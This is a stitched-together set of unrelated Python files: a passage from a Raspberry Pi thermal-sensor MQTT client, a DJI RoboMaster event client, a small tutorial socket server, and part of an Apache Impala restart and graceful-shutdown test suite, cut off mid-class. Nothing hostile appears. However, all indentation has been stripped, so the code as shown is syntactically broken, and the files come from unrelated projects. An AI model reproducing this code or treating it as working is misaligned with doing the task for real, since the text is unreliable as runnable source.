TCP_addr = config["mlx_nuc_ip_to_send_json"]
broker = config["mqtt_broker_ip"]
port = config["mqtt_broker_port"]
RPI_ROOM_TYPE = config["room_type"]
data_collection_process = None  # placeholder for the process that collects data
i2c = busio.I2C(board.SCL, board.SDA, frequency=400000) # setup I2C
mlx = adafruit_mlx90640.MLX90640(i2c) # begin MLX90640 with I2C comm
mlx.refresh_rate = adafruit_mlx90640.RefreshRate.REFRESH_2_HZ # set refresh
data = Queue()
data_times = Queue()
class ClientProtocol:
def __init__(self):
self.socket = None
def connect(self, server_ip, server_port):
self.socket = socket(AF_INET, SOCK_STREAM)
self.socket.connect((server_ip, server_port))
print("Connected to TCP Server")
def close(self):
self.socket.shutdown(SHUT_WR)
self.socket.close()
self.socket = None
def send_data(self, data):
# use struct to make sure we have a consistent endianness on the length
length = pack('>Q', len(data))
# sendall to make sure it blocks if there's back-pressure on the socket
self.socket.sendall(length)
self.socket.sendall(data)
ack = self.socket.recv(1)
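# Hedged sketch of the assumed receiving side (the NUC server is not in this
# file): send_data() writes an 8-byte big-endian length ('>Q') followed by the
# JSON payload, then blocks on a 1-byte ack, so a matching reader could look
# like this (short-read handling on the length prefix omitted for brevity):
#
#     from struct import unpack
#     def recv_payload(conn):
#         (length,) = unpack('>Q', conn.recv(8))
#         buf = b''
#         while len(buf) < length:
#             buf += conn.recv(min(4096, length - len(buf)))
#         conn.sendall(b'\x00')   # the 1-byte ack ClientProtocol waits for
#         return buf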
cp = ClientProtocol()
def interpolate_values(df):
"""
:param: 24x32 data frame obtained from get_nan_value_indices(df)
:return: 24x32 array
"""
nan_value_indices = np.argwhere(np.isnan(df))
x_max = df.shape[0] - 1
y_max = df.shape[1] - 1
for indx in nan_value_indices:
x = indx[0]
y = indx[1]
if x == 0 and y == 0:
df[x][y] = (df[x + 1][y] + df[x][y + 1]) / 2
elif (x == x_max and y == y_max):
df[x][y] = (df[x - 1][y] + df[x][y - 1]) / 2
elif (x == 0 and y == y_max):
df[x][y] = (df[x + 1][y] + df[x][y - 1]) / 2
elif (x == x_max and y == 0):
df[x][y] = (df[x - 1][y] + df[x][y + 1]) / 2
elif (x == 0):
df[x][y] = (df[x + 1][y] + df[x][y - 1] + df[x][y + 1]) / 3
elif (x == x_max):
df[x][y] = (df[x - 1][y] + df[x][y - 1] + df[x][y + 1]) / 3
elif (y == 0):
df[x][y] = (df[x + 1][y] + df[x - 1][y] + df[x][y + 1]) / 3
elif (y == y_max):
df[x][y] = (df[x - 1][y] + df[x + 1][y] + df[x][y - 1]) / 3
else:
df[x][y] = (df[x][y + 1] + df[x + 1][y] + df[x - 1][y] + df[x][y - 1]) / 4
return df
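# Hedged illustrative example: each NaN cell is replaced by the mean of its
# in-bounds neighbours, e.g. for a tiny 2x2 frame:
#
#     >>> demo = np.array([[1.0, np.nan], [3.0, 5.0]])
#     >>> interpolate_values(demo)
#     array([[1., 3.],
#            [3., 5.]])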
def collect_data(data):
frame = [0] * 768
counter = 0
while True:
try:
mlx.getFrame(frame) # get the mlx values and put them into the array we just created
array = np.array(frame)
if np.sum(array) > 0:
df = np.reshape(array.astype(float), ARRAY_SHAPE)
df = interpolate_values(df)
data.put(df)
print("Frame collected [{}]".format(counter))
counter += 1
except ValueError:
# these happen, no biggie - retry
print("ValueError during data collection")
pass
except InterruptedError:
pass
# print("Stopping data collection..., num frames collected: {}".format(len(data)))
def on_message(client,userdata, msg):
try:
global data_collection_process
m_decode=str(msg.payload.decode("utf-8","ignore"))
"""
# debug message
print("=============================")
print("message received for {}!".format(RPI_ROOM_TYPE))
print("msg: {0}".format(m_decode))
"""
# check topic
topic=msg.topic
# print("Topic: " + topic)
sensor_type, house_id = topic.split("/")
# print("Sensor Type: {}, House_ID: {}".format(sensor_type, house_id))
# print("data_collection_process: {0}".format(data_collection_process))
# check decoded message content and change current MLX shown
if m_decode == RPI_ROOM_TYPE and not data_collection_process:
print("start mlx collection")
# spawns parallel process to write sensor data to .npy files
start_time = time.strftime("%Y.%m.%d_%H%M%S",time.localtime(time.time()))
data_times.put(start_time)
data_collection_process = Process(target=main.collect_data, args=(data, ))
data_collection_process.start()
elif data_collection_process:
print("end mlx collection")
data_collection_process.terminate()
data_collection_process = None
end_time = time.strftime("%Y.%m.%d_%H%M%S",time.localtime(time.time()))
collected_data = []
while not data.empty():
try:
collected_data.append(data.get())
except Exception as e:
print(e)
break
# print("Sending data array of length: {}".format(len(data)))
start_time = data_times.get()
print("Data collection started at {}, and ended at {}".format(start_time,end_time))
# pdb.set_trace()
print("len(collected_data): {0}".format(len(collected_data)))
if len(collected_data) != 0:
analysis_result = displacement_history(collected_data, start_time, end_time)
analysis_result["room_type"] = RPI_ROOM_TYPE
print("analysis_result: {0}".format(analysis_result))
to_send = json.dumps(analysis_result)
byte_data = to_send.encode("utf-8")
cp.connect(TCP_addr, config["mlx_nuc_port_to_send_json"])
print("len(byte_data): {0}".format(len(byte_data)))
cp.send_data(byte_data)
cp.close()
start_time = None
end_time = None
collected_data.clear()
print("Resetted data array, now length: {}".format(len(collected_data)))
except InterruptedError:
if data_collection_process:
data_collection_process.terminate()
exit(0)
except Exception as e:
print(e)
pdb.set_trace()
def on_connect(client, userdata, flags, rc):
if rc == 0:
print ("Connection OK!")
else:
print("Bad connection, Returned Code: ", rc)
def on_disconnect(client, userdata, flags, rc=0):
print("Disconnected result code " + str(rc))
import paho.mqtt.client as mqtt
client = mqtt.Client()
client.connect(config["mqtt_broker_ip"], config["mqtt_broker_port"])
client.subscribe(topic=config["mlx_topic_to_listen"])
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_message = on_message # makes it so that the callback on receiving a message calls on_message() above
client.publish(config["mlx_topic_to_publish"], "Rpi operational!")
try:
client.loop_forever()
except Exception as e:
print(e)
"""
except InterruptedError as e:
if data_collection_process:
data_collection_process.terminate()
"""
|
event_client.py
|
import traceback
import duml_cmdset
import duss_event_msg
import rm_define
import rm_log
import socket
import sys
import threading
import time
import tools
import user_script_ctrl
logger = rm_log.dji_scratch_logger_get()
default_target_address = '\0/duss/mb/0x900'
DUSS_EVENT_MSG_HEADER_LEN = 4
class EventAckIdentify(object):
def __init__(self):
self.valid = False
self.identify = 0
self.wait_ack_event = threading.Event()
class EventClient(object):
DEFAULT_ROUTE_FILE = '/system/etc/dji.json'
def __init__(self, host_id=rm_define.script_host_id):
self.debug = False
self.route_table, _, _ = tools.load_route_table(EventClient.DEFAULT_ROUTE_FILE, 'scratch_service',
'scratch_client')
self.my_server_address = '\0/duss/mb/' + str(hex(host_id))
self.my_host_id = host_id
self.wait_ack_list = {}
self.wait_ack_mutex = threading.Lock()
self.wait_ack_event_list = []
self.cur_task_attri = {}
self.finish = False
self.script_state = user_script_ctrl.UserScriptCtrl()
self.async_req_cb_list = {}
self.async_ack_cb_list = {}
self.event_process_mutex = threading.Lock()
self.event_process_list = {}
self.event_callback_list = {}
self.event_notify_mutex = threading.Lock()
self.event_notify_list = {}
self.event_notify_not_register_dict = {}
self.event_process_flag = False
self.async_cb_mutex = threading.Lock()
self.check_event_msg_invalid_callback = None
self.already_finish_task_identify_set = set()
self.task_push_cmdid_list = []
for i in range(1, 9):
ackIdentify = EventAckIdentify()
self.wait_ack_event_list.append(ackIdentify)
logger.info('WAIT ACK EVENT LIST LEN = ' + str(len(self.wait_ack_event_list)))
self.socketfd = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
self.my_server = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
self.my_server.bind(self.my_server_address)
self.recv_thread = threading.Thread(target=self.__recv_task)
self.recv_thread.start()
except Exception as e:
logger.fatal('EventClient: server error, message: ')
logger.fatal('TRACEBACK:\n' + traceback.format_exc())
sys.exit(-1)
def stop(self):
logger.info('EventClient: STOP')
self.finish = True
# send something to quit.
self.send2myself('quit')
self.recv_thread.join(3)
        logger.info('EventClient: recv thread alive = ' + str(self.recv_thread.is_alive()))
self.socketfd.close()
self.my_server.close()
logger.info('EventClient host id = ' + str(self.my_host_id) + ' Exit!!!')
def __recv_task(self):
logger.info('START RECVING TASK...')
while self.finish == False:
recv_buff, host = self.my_server.recvfrom(1024)
if self.finish:
logger.info('EventClient: NEED QUIT!')
break
if recv_buff == None:
logger.fatal('FATAL ERROR RECV BUFF = NONE!!!')
continue
# pack.unpack -> EventMsg.
msg = duss_event_msg.unpack(recv_buff)
if msg == None:
continue
# whether task push msg
if msg['cmd_set'] == duml_cmdset.DUSS_MB_CMDSET_RM:
if msg['cmd_id'] in self.task_push_cmdid_list:
msg['task_id'] = msg['data'][0]
task_identify = str(msg['cmd_set']) + str(msg['cmd_id']) + str(msg['task_id'])
self.task_sync_process(task_identify, msg)
continue
# handle_one_message()
if msg['ack'] == True:
identify = str(msg['sender']) + str(msg['cmd_set']) + str(msg['cmd_id']) + str(msg['seq_num'])
# logger.info('GET ACK MSG: identify = ' + identify)
self.wait_ack_mutex.acquire()
if identify in self.wait_ack_list.keys():
for j in range(0, len(self.wait_ack_event_list)):
if self.wait_ack_event_list[j].valid and self.wait_ack_event_list[j].identify == identify:
self.wait_ack_list[identify] = msg
self.wait_ack_event_list[j].wait_ack_event.set()
else:
pass
# logger.warn('SENDER = ' + str(msg['sender']) + ' CMDSET = ' + str(hex(msg['cmd_set'])) + ' CMDID = ' + str(hex(msg['cmd_id']) + str(msg)) + ' NOT IN WAIT ACK LIST!!!')
self.wait_ack_mutex.release()
# TODO self.async_ack_cb_list
cmd_set_id = msg['cmd_set'] << 8 | msg['cmd_id']
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_ack_cb_list.keys():
# logger.info('ASYNC ACK MSG = ' + str(cmd_set_id) + ' HANDLE.')
self.async_ack_cb_list[cmd_set_id](self, msg)
self.async_cb_mutex.release()
else:
# TODO self.async_req_cb_list
cmd_set_id = msg['cmd_set'] << 8 | msg['cmd_id']
# if msg['cmd_set'] != 0x04:
# logger.info('CMD SETID = ' + str(cmd_set_id))
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_req_cb_list.keys():
# logger.info('ASYNC MSG = ' + str(cmd_set_id) + ' HANDLE.')
for cb in self.async_req_cb_list[cmd_set_id]:
cb(self, msg)
else:
logger.warn(
'UNSUPPORT MSG CMD SET = ' + str(hex(msg['cmd_set'])) + ', CMD ID = ' + str(hex(msg['cmd_id'])))
self.async_cb_mutex.release()
logger.info('RECV TASK FINISH!!!')
def send(self, data, target_address):
try:
self.socketfd.sendto(data, target_address)
except:
return duml_cmdset.DUSS_MB_RET_ACK
def send2myself(self, data):
try:
self.socketfd.setblocking(0)
self.socketfd.sendto(data.encode('utf-8'), '\0/duss/mb/' + str(hex(self.my_host_id)))
except Exception as e:
logger.error('EVENT_CLIENT: send2myself() error, message: ')
            logger.error(traceback.format_exc())
def is_wait(self):
return False
##############################################################################################
# TODO return value, if callback is already exist, support multip callback?
def async_req_register(self, cmd_set_id, callback):
logger.info('ASYNC REGISTER CMD_SETID = ' + str(hex(cmd_set_id)))
self.async_cb_mutex.acquire()
if cmd_set_id not in self.async_req_cb_list.keys():
self.async_req_cb_list[cmd_set_id] = []
if cmd_set_id not in self.async_req_cb_list[cmd_set_id]:
self.async_req_cb_list[cmd_set_id].append(callback)
self.async_cb_mutex.release()
def async_req_unregister(self, cmd_set_id, cb=None):
logger.info('ASYNC UNREGISTER CMD_SETID = ' + str(cmd_set_id))
self.async_cb_mutex.acquire()
if cb != None:
if cmd_set_id in self.async_req_cb_list.keys() and cb in self.async_req_cb_list[cmd_set_id]:
                self.async_req_cb_list[cmd_set_id].remove(cb)
elif cmd_set_id in self.async_req_cb_list.keys():
self.async_req_cb_list.pop(cmd_set_id)
self.async_cb_mutex.release()
def async_ack_register(self, cmd_set_id, callback):
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_req_cb_list.keys():
self.async_ack_cb_list[cmd_set_id] = callback
self.async_cb_mutex.release()
def async_ack_unregister(self, cmd_set_id, callback):
self.async_cb_mutex.acquire()
if cmd_set_id in self.async_ack_cb_list.keys():
self.async_ack_cb_list.pop(cmd_set_id)
self.async_cb_mutex.release()
def event_notify_register(self, event_name, robot_event):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_not_register_dict.keys() and time.time() - \
self.event_notify_not_register_dict[event_name] < 5:
robot_event.notify_for_task_complete()
self.event_notify_not_register_dict.pop(event_name)
else:
self.event_notify_list[event_name] = robot_event
self.event_notify_mutex.release()
def event_notify(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
robot_event = self.event_notify_list[event_name]
robot_event.notify_for_task_complete()
else:
self.event_notify_not_register_dict[event_name] = time.time()
self.event_notify_mutex.release()
def event_watchdog_set(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
robot_event = self.event_notify_list[event_name]
robot_event.watchdog_set()
self.event_notify_mutex.release()
def event_notify_unregister(self, event_name):
self.event_notify_mutex.acquire()
if event_name in self.event_notify_list.keys():
self.event_notify_list.pop(event_name)
self.event_notify_mutex.release()
def event_callback_register(self, event_name, callback):
self.event_process_mutex.acquire()
self.event_callback_list[event_name] = callback
self.event_process_list[event_name] = {'callback': None, 'callback_data': None}
self.event_process_mutex.release()
def event_come_to_process(self, event_name, callback_data=None):
self.event_process_mutex.acquire()
if event_name in self.event_callback_list.keys():
self.event_process_list[event_name]['callback'] = self.event_callback_list[event_name]
self.event_process_list[event_name]['callback_data'] = callback_data
else:
logger.error('EVENTCTRL: NO CB REGISTER, FUNC IS %s', event_name)
self.event_process_mutex.release()
def wait_for_event_process(self, func_before_event):
callback_list = []
# append the event to list
self.event_process_mutex.acquire()
for (event_name, callback_items) in self.event_process_list.items():
if callback_items['callback'] != None and callback_items['callback'].__name__ != 'dummy_callback':
callback_list.append(callback_items)
self.event_process_list[event_name] = {'callback': None, 'callback_data': None}
self.event_process_mutex.release()
        # no event needs processing, or an event is already being processed
if len(callback_list) <= 0 or self.event_process_flag:
return False
# exec func before process event
if func_before_event != None:
func_before_event()
# set event process flag to true
self.event_process_flag = True
for item in callback_list:
func = item['callback']
data = item['callback_data']
func(data)
self.event_process_flag = False
return True
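    # Pending synchronous ACKs are keyed by an "identify" string built from
    # receiver + cmd_set + cmd_id + seq_num; the receive task looks up the same
    # key to hand the response back and wake the waiter inside send_sync().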
def ack_register_identify(self, event_msg):
self.wait_ack_mutex.acquire()
identify = str(event_msg.receiver) + str(event_msg.cmd_set) + str(event_msg.cmd_id) + str(event_msg.seq_num)
# logger.info('ACK REGISTER IDENTIFY = ' + identify)
self.wait_ack_list[identify] = True
self.wait_ack_mutex.release()
return identify
def ack_unregister_identify(self, identify):
resp = {}
self.wait_ack_mutex.acquire()
if identify in self.wait_ack_list.keys():
resp = self.wait_ack_list.pop(identify)
self.wait_ack_mutex.release()
return resp
# return duss_result
def send_msg(self, event_msg):
try:
if self.debug:
logger.info(str(event_msg.data))
target_address = default_target_address
if event_msg.receiver in self.route_table.keys():
target_address = self.route_table[event_msg.receiver]['target_address']
if event_msg.cmd_type & duml_cmdset.NEED_ACK_TYPE:
event_msg.cmd_type &= ~duml_cmdset.NO_ACK_TYPE
data = event_msg.pack()
self.send(data, target_address)
except Exception as e:
logger.fatal("Exception in send_msg, " + traceback.format_exc())
return rm_define.DUSS_ERR_FAILURE
return rm_define.DUSS_SUCCESS
# return duss_result, resp
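    # send_sync() flow: register an identify for the expected ACK, claim a free
    # slot in wait_ack_event_list, send the message, then block on that slot's
    # event for up to time_out seconds. A timeout yields DUSS_ERR_TIMEOUT;
    # otherwise the response recorded under the identify is popped and returned.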
def send_sync(self, event_msg, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
# logger.info('RECEIVER = ' + str(event_msg.receiver) + ', CMDSET = ' + str(hex(event_msg.cmd_set)) + ', CMDID = ' + str(hex(event_msg.cmd_id)))
duss_result = rm_define.DUSS_SUCCESS
check_result, invalid_code = self.check_event_msg_invalid(event_msg)
if check_result == True:
logger.warn('RECEIVER %d, MODULE ID %d, OFFLINE OR ERROR %s' % (
event_msg.receiver, event_msg.module_id, invalid_code))
return invalid_code, None
if event_msg.cmd_type & duml_cmdset.NEED_ACK_TYPE:
identify = self.ack_register_identify(event_msg)
j = 0
for j in range(0, len(self.wait_ack_event_list)):
if not self.wait_ack_event_list[j].valid:
# logger.info('VALID INDEX = ' + str(j))
break
self.wait_ack_event_list[j].valid = True
self.wait_ack_event_list[j].identify = identify
self.wait_ack_event_list[j].wait_ack_event.clear()
self.send_msg(event_msg)
# TODO EVENT_AUTOCLEAR need event.wait with flag
self.wait_ack_event_list[j].wait_ack_event.wait(time_out)
if not self.wait_ack_event_list[j].wait_ack_event.isSet():
duss_result = rm_define.DUSS_ERR_TIMEOUT
logger.warn(
'CMDSET = ' + str(hex(event_msg.cmd_set)) + ', CMDID = ' + str(hex(event_msg.cmd_id)) + ' TIMEOUT')
self.wait_ack_event_list[j].valid = False
resp = self.ack_unregister_identify(identify)
return duss_result, resp
else:
self.send_msg(event_msg)
return duss_result, None
# return duss_result
def send_task_async(self, event_msg, event_task, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
if event_task['cmd_id'] not in self.task_push_cmdid_list:
self.task_push_cmdid_list.append(event_task['cmd_id'])
identify = str(event_task['cmd_set']) + str(event_task['cmd_id']) + str(event_task['task_id'])
duss_result, resp = self.send_sync(event_msg, time_out)
# TODO process duss_result
if duss_result != rm_define.DUSS_SUCCESS:
logger.error('EVENT: send task %s, error code = %d' % (identify, duss_result))
return duss_result, identify
if resp['data'][0] == duml_cmdset.DUSS_MB_RET_OK:
if resp['data'][1] == 0:
logger.info('TASK ID = ' + str(event_task['task_id']) + ' ACCEPTED')
duss_result = rm_define.DUSS_SUCCESS
elif resp['data'][1] == 1:
logger.info('TASK ID = ' + str(event_task['task_id']) + ' REJECTED')
duss_result = rm_define.DUSS_TASK_REJECTED
elif resp['data'][1] == 2:
logger.info('TASK ID = ' + str(event_task['task_id']) + ' ALREADY FINISH.')
self.already_finish_task_identify_set.add(identify)
duss_result = rm_define.DUSS_TASK_FINISHED
else:
logger.warn('UNSUPPORT TASK RESULT')
duss_result = rm_define.DUSS_ERR_FAILURE
else:
logger.error('RETURN CODE ERROR')
duss_result = rm_define.DUSS_ERR_FAILURE
return duss_result, identify
def task_sync_process(self, identify, task_push_msg):
task_push_msg['task_id'] = task_push_msg['data'][0]
task_push_msg['result'] = task_push_msg['data'][2] & 0x3
task_push_msg['fail_reason'] = (task_push_msg['data'][2] >> 2) & 0x7
task_push_msg['percent'] = task_push_msg['data'][1]
self.script_state.set_block_running_percent(task_push_msg['percent'])
self.script_state.set_block_running_fail_reason_code(task_push_msg['fail_reason'])
logger.info(
'TASK ID = ' + str(task_push_msg['task_id']) + ', ' + str(task_push_msg['percent']) + '% STATE = ' + str(
task_push_msg['result']) + ' FAIL_REASON = ' + str(task_push_msg['fail_reason']))
self.event_watchdog_set(identify)
if task_push_msg['result'] != 0:
logger.info('TASK ID = ' + str(task_push_msg['task_id']) + ' FINISHED.')
if identify in self.already_finish_task_identify_set:
self.already_finish_task_identify_set.remove(identify)
else:
self.event_notify(identify)
def send_task_stop(self, event_msg, time_out=duml_cmdset.MSG_DEFAULT_TIMEOUT):
duss_result, resp = self.send_sync(event_msg, time_out)
return duss_result
def send_async(self):
# TODO
pass
def resp_ok(self, msg):
self.resp_retcode(msg, duml_cmdset.DUSS_MB_RET_OK)
def resp_retcode(self, msg, retcode):
event_msg = duss_event_msg.unpack2EventMsg(msg)
event_msg.clear()
event_msg.append('ret_code', 'uint8', retcode)
event_msg.sender, event_msg.receiver = event_msg.receiver, event_msg.sender
event_msg.cmd_type = duml_cmdset.ACK_PKG_TYPE
self.send_msg(event_msg)
def resp_event_msg(self, event_msg):
event_msg.sender, event_msg.receiver = event_msg.receiver, event_msg.sender
event_msg.cmd_type = duml_cmdset.ACK_PKG_TYPE
self.send_msg(event_msg)
def event_msg_invalid_check_callback_register(self, callback):
self.check_event_msg_invalid_callback = callback
def event_msg_invalid_check_callback_unregister(self):
self.check_event_msg_invalid_callback = None
def check_event_msg_invalid(self, event_msg):
if callable(self.check_event_msg_invalid_callback):
return self.check_event_msg_invalid_callback(event_msg)
else:
return False, None
|
server.py
|
# based on https://www.youtube.com/watch?v=3QiPPX-KeSc
import socket
import threading
HEADER = 64
PORT = 5050
# local IP address
SERVER = socket.gethostbyname(socket.gethostname())
print("Local IP address: ",SERVER)
print("host name: ",socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn,addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount()-1}")
print("[STARTING] server is starting...")
start()
|
test_restart_services.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import os
import pytest
import psutil
import re
import signal
import socket
import time
import threading
from subprocess import check_call
from tests.common.environ import build_flavor_timeout
from time import sleep
from impala.error import HiveServer2Error
from TCLIService import TCLIService
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfGCS
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
LOG = logging.getLogger(__name__)
class TestRestart(CustomClusterTestSuite):
@classmethod
def get_workload(cls):
return 'functional-query'
@pytest.mark.execute_serially
def test_restart_statestore(self, cursor):
""" Regression test of IMPALA-6973. After the statestore restarts, the metadata should
eventually recover after being cleared by the new statestore.
"""
self.cluster.statestored.restart()
# We need to wait for the impalad to register to the new statestored and for a
# non-empty catalog update from the new statestored. It cannot be expressed with the
# existing metrics yet so we wait for some time here.
wait_time_s = build_flavor_timeout(60, slow_build_timeout=100)
sleep(wait_time_s)
for retry in xrange(wait_time_s):
try:
cursor.execute("describe database functional")
return
except HiveServer2Error, e:
assert "AnalysisException: Database does not exist: functional" in e.message,\
"Unexpected exception: " + e.message
sleep(1)
assert False, "Coordinator never received non-empty metadata from the restarted " \
"statestore after {0} seconds".format(wait_time_s)
@pytest.mark.execute_serially
def test_restart_impala(self):
""" This test aims to restart Impalad executor nodes between queries to exercise
the cluster membership callback which removes stale connections to the restarted
nodes."""
self._start_impala_cluster([], num_coordinators=1, cluster_size=3)
assert len(self.cluster.impalads) == 3
client = self.cluster.impalads[0].service.create_beeswax_client()
assert client is not None
for i in xrange(5):
self.execute_query_expect_success(client, "select * from functional.alltypes")
node_to_restart = 1 + (i % 2)
self.cluster.impalads[node_to_restart].restart()
# Sleep for a bit for the statestore change in membership to propagate. The min
# update frequency for statestore is 100ms but using a larger sleep time here
# as certain builds (e.g. ASAN) can be really slow.
sleep(3)
client.close()
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
# Debug action to delay statestore updates to give the restarted impalad time to
# register itself before a membership topic update is generated.
statestored_args="--debug_actions=DO_SUBSCRIBER_UPDATE:JITTER@10000")
def test_statestore_update_after_impalad_restart(self):
"""Test that checks that coordinators are informed that an impalad went down even if
the statestore doesn't send a membership update until after a new impalad has been
restarted at the same location."""
if self.exploration_strategy() != 'exhaustive':
pytest.skip()
assert len(self.cluster.impalads) == 3
client = self.cluster.impalads[0].service.create_beeswax_client()
assert client is not None
handle = client.execute_async(
"select count(*) from functional.alltypes where id = sleep(100000)")
node_to_restart = self.cluster.impalads[2]
node_to_restart.restart()
# Verify that the query is cancelled due to the failed impalad quickly.
self.wait_for_state(handle, QueryState.EXCEPTION, 20, client=client)
@pytest.mark.execute_serially
def test_catalog_connection_retries(self):
"""Test that connections to the catalogd are retried, both new connections and cached
connections."""
# Since this is a custom cluster test, each impalad should start off with no cached
# connections to the catalogd. So the first call to __test_catalog_connection_retries
# should test that new connections are retried.
coordinator_service = self.cluster.impalads[0].service
assert coordinator_service.get_metric_value(
"catalog.server.client-cache.total-clients") == 0
self.__test_catalog_connection_retries()
# Since a query was just run that required loading metadata from the catalogd, there
# should be a cached connection to the catalogd, so the second call to
# __test_catalog_connection_retries should assert that broken cached connections are
# retried.
assert coordinator_service.get_metric_value(
"catalog.server.client-cache.total-clients") == 1
self.__test_catalog_connection_retries()
def __test_catalog_connection_retries(self):
"""Test that a query retries connecting to the catalogd. Kills the catalogd, launches
a query that requires catalogd access, starts the catalogd, and then validates that
the query eventually finishes successfully."""
self.cluster.catalogd.kill_and_wait_for_exit()
query = "select * from functional.alltypes limit 10"
query_handle = []
# self.execute_query_async has to be run in a dedicated thread because it does not
# truly run a query asynchronously. The query compilation has to complete before
# execute_query_async can return. Since compilation requires catalogd access,
# execute_query_async won't return until the catalogd is up and running.
def execute_query_async():
query_handle.append(self.execute_query_async(query))
thread = threading.Thread(target=execute_query_async)
thread.start()
# Sleep until the query actually starts to try and access the catalogd. Set an
# explicitly high value to avoid any race conditions. The connection is retried 3
# times by default with a 10 second interval, so a high sleep time should not cause
# any timeouts.
sleep(5)
self.cluster.catalogd.start()
thread.join()
self.wait_for_state(query_handle[0], QueryState.FINISHED, 30000)
SUBSCRIBER_TIMEOUT_S = 2
CANCELLATION_GRACE_PERIOD_S = 5
@pytest.mark.execute_serially
@SkipIfNotHdfsMinicluster.scheduling
@CustomClusterTestSuite.with_args(
impalad_args="--statestore_subscriber_timeout_seconds={timeout_s} "
"--statestore_subscriber_recovery_grace_period_ms={recovery_period_ms}"
.format(timeout_s=SUBSCRIBER_TIMEOUT_S,
recovery_period_ms=(CANCELLATION_GRACE_PERIOD_S * 1000)),
catalogd_args="--statestore_subscriber_timeout_seconds={timeout_s}".format(
timeout_s=SUBSCRIBER_TIMEOUT_S))
def test_restart_statestore_query_resilience(self):
"""IMPALA-7665: Test that after restarting statestore a momentary inconsistent
cluster membership state will not result in query cancellation. Also make sure that
queries get cancelled if a backend actually went down while the statestore was
down or during the grace period."""
slow_query = \
"select distinct * from tpch_parquet.lineitem where l_orderkey > sleep(1000)"
impalad = self.cluster.impalads[0]
client = impalad.service.create_beeswax_client()
try:
handle = client.execute_async(slow_query)
# Make sure query starts running.
self.wait_for_state(handle, QueryState.RUNNING, 1000)
profile = client.get_runtime_profile(handle)
assert "NumBackends: 3" in profile, profile
# Restart Statestore and wait till the grace period ends + some buffer.
self.cluster.statestored.restart()
self.cluster.statestored.service.wait_for_live_subscribers(4)
sleep(self.CANCELLATION_GRACE_PERIOD_S + 1)
assert client.get_state(handle) == QueryState.RUNNING
# Now restart statestore and kill a backend while it is down, and make sure the
# query fails when it comes back up.
start_time = time.time()
self.cluster.statestored.kill()
self.cluster.impalads[1].kill()
self.cluster.statestored.start()
try:
client.wait_for_finished_timeout(handle, 100)
assert False, "Query expected to fail"
except ImpalaBeeswaxException as e:
assert "Failed due to unreachable impalad" in str(e), str(e)
assert time.time() - start_time > self.CANCELLATION_GRACE_PERIOD_S + \
self.SUBSCRIBER_TIMEOUT_S, \
"Query got cancelled earlier than the cancellation grace period"
# Now restart statestore and kill a backend after it comes back up, and make sure
# the query eventually fails.
# Make sure the new statestore has received update from catalog and sent it to the
# impalad.
catalogd_version = self.cluster.catalogd.service.get_catalog_version()
impalad.service.wait_for_metric_value("catalog.curr-version", catalogd_version)
handle = client.execute_async(slow_query)
self.wait_for_state(handle, QueryState.RUNNING, 1000)
profile = client.get_runtime_profile(handle)
assert "NumBackends: 2" in profile, profile
start_time = time.time()
self.cluster.statestored.restart()
# Make sure it has connected to the impalads before killing one.
self.cluster.statestored.service.wait_for_live_subscribers(3)
self.cluster.impalads[2].kill()
try:
client.wait_for_finished_timeout(handle, 100)
assert False, "Query expected to fail"
except ImpalaBeeswaxException as e:
assert "Failed due to unreachable impalad" in str(e), str(e)
assert time.time() - start_time > self.CANCELLATION_GRACE_PERIOD_S + \
self.SUBSCRIBER_TIMEOUT_S, \
"Query got cancelled earlier than the cancellation grace period"
finally:
client.close()
def parse_shutdown_result(result):
"""Parse the shutdown result string and return the strings (grace left,
deadline left, queries registered, queries executing)."""
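  # Example of a summary line this expects (values illustrative only):
  #   shutdown grace period left: 1s000ms, deadline left: 10s000ms,
  #   queries registered on coordinator: 0, queries executing: 1, fragment instances: 0
  # which would be returned as ("1s000ms", "10s000ms", "0", "1").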
assert len(result.data) == 1
summary = result.data[0]
match = re.match(r'shutdown grace period left: ([0-9ms]*), deadline left: ([0-9ms]*), '
r'queries registered on coordinator: ([0-9]*), queries executing: '
r'([0-9]*), fragment instances: [0-9]*', summary)
assert match is not None, summary
return match.groups()
class TestGracefulShutdown(CustomClusterTestSuite, HS2TestSuite):
IDLE_SHUTDOWN_GRACE_PERIOD_S = 1
IMPALA_SHUTDOWN_SIGNAL = signal.SIGRTMIN
@classmethod
def get_workload(cls):
return 'functional-query'
@SkipIfGCS.jira(reason="IMPALA-10562")
